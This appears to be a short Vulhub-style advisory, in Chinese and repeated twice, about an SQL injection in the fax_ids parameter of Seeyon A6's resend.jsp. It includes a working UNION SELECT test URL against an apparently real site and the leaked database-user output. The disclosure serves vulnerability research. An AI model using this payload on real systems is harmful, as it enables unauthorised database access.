VULHUB ™

北京致远协创软件有限公司的致远软件连续10年获得中国协同管理软件市场占有率第一（CCID），连续6年获得中国协同软件用户满意度第一（CCW），被中国软件行业协会评为中国软件行业领军企业，是中国协同管理软件的开创者和领导者。 公司与Oracle、SAP、IBM、Microsoft、Samsung、用友、华为、中国移动、中国联通、中国电信等国内外知名企业形成长期战略合作关系。目前公司拥有1500多家合作伙伴，3000多名伙伴顾问，随时随地为客户提供全方位服务。致远协同管理软件已经拥有30000家企业级客户，每天有超过400万终端用户使用致远协同管理软件产品与服务。 在其A6协同管理软件中，由于页面： /yyoa/ext/trafaxserver/SendFax/resend.jsp 参数fax_ids过滤不严格存在SQL注入漏洞产生。 简单测试方法： http://www.ssepec.net/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20and%201=2%20union%20select%20user()%20-- java.sql.SQLException: Invalid value for getInt() - 'root@localhost'

北京致远协创软件有限公司的致远软件连续10年获得中国协同管理软件市场占有率第一（CCID），连续6年获得中国协同软件用户满意度第一（CCW），被中国软件行业协会评为中国软件行业领军企业，是中国协同管理软件的开创者和领导者。 公司与Oracle、SAP、IBM、Microsoft、Samsung、用友、华为、中国移动、中国联通、中国电信等国内外知名企业形成长期战略合作关系。目前公司拥有1500多家合作伙伴，3000多名伙伴顾问，随时随地为客户提供全方位服务。致远协同管理软件已经拥有30000家企业级客户，每天有超过400万终端用户使用致远协同管理软件产品与服务。 在其A6协同管理软件中，由于页面： /yyoa/ext/trafaxserver/SendFax/resend.jsp 参数fax_ids过滤不严格存在SQL注入漏洞产生。 简单测试方法： http://www.ssepec.net/yyoa/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20and%201=2%20union%20select%20user()%20-- java.sql.SQLException: Invalid value for getInt() - 'root@localhost'